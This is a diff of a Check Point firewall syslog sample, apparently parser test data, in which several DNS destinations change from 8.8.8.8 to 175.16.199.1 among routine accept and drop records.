-<134>1 2020-03-29T18:12:38Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e516,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585505558"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43486"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:12:38Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e516,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585505558"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"40684"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:12:37Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e515,0x6,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585505557"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"33768"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:12:38Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e516,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585505558"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43486"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:12:38Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e516,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585505558"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"40684"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T18:12:38Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e516,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"13.48.233.241"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"58966"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:12:39Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e516,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585505558"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"54105"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:12:39Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e516,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585505558"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"54105"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T18:12:39Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e516,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"195.88.55.116"; log_delay:"1585505558"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"58822"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T18:13:34Z gw-da58d3 CheckPoint 8363 - [action:"Drop"; flags:"395524"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e550,0x0,0x6401a8c0,0x108620ab}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"255.255.255.255"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"3"; parent_rule:"0"; rule_action:"Drop"; rule_name:"Cleanup rule"; rule_uid:"76fd22f2-efa8-4c81-a617-40201d3f5c4e"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"68"; service:"67"; service_id:"bootp"; src:"0.0.0.0"]
 <134>1 2020-03-29T18:13:36Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e550,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43103"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
@@ -3751,7 +3751,7 @@
 <134>1 2020-03-29T18:16:37Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e605,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.124.249.31"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"64052"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10194"; xlatesrc:"0.0.0.0"]
 <134>1 2020-03-29T18:16:37Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e605,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43344"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T18:16:37Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e605,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.124.249.41"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"51368"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10195"; xlatesrc:"0.0.0.0"]
-<134>1 2020-03-29T18:17:17Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e62d,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"45816"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:17:17Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e62d,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"45816"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T18:17:19Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e62e,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60640"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
 <134>1 2020-03-29T18:17:21Z gw-da58d3 CheckPoint 8363 - [action:"Drop"; flags:"395524"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e633,0x0,0x6401a8c0,0x108620ab}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"255.255.255.255"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"3"; parent_rule:"0"; rule_action:"Drop"; rule_name:"Cleanup rule"; rule_uid:"76fd22f2-efa8-4c81-a617-40201d3f5c4e"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"68"; service:"67"; service_id:"bootp"; src:"0.0.0.0"]
 <134>1 2020-03-29T18:17:23Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e633,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43103"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
@@ -3762,7 +3762,7 @@
 <134>1 2020-03-29T18:18:37Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e67d,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"57674"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T18:18:37Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e67d,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"104.81.142.43"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"36102"; service:"443"; service_id:"https"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10196"; xlatesrc:"0.0.0.0"]
 <134>1 2020-03-29T18:18:37Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e67d,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43976"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
-<134>1 2020-03-29T18:18:42Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e682,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43177"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
+<134>1 2020-03-29T18:18:42Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e682,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43177"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T18:18:42Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e682,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.124.249.31"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"64112"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10197"; xlatesrc:"0.0.0.0"]
 <134>1 2020-03-29T18:18:42Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e682,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"48118"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T18:18:42Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e682,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.124.249.31"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"64114"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10198"; xlatesrc:"0.0.0.0"]
@@ -3775,12 +3775,12 @@
 <134>1 2020-03-29T18:19:48Z gw-da58d3 CheckPoint 8363 - [action:"Drop"; flags:"395524"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e6c5,0x0,0x6401a8c0,0x108620ab}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"255.255.255.255"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"3"; parent_rule:"0"; rule_action:"Drop"; rule_name:"Cleanup rule"; rule_uid:"76fd22f2-efa8-4c81-a617-40201d3f5c4e"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"68"; service:"67"; service_id:"bootp"; src:"0.0.0.0"]
 <134>1 2020-03-29T18:19:49Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e6c5,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60640"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
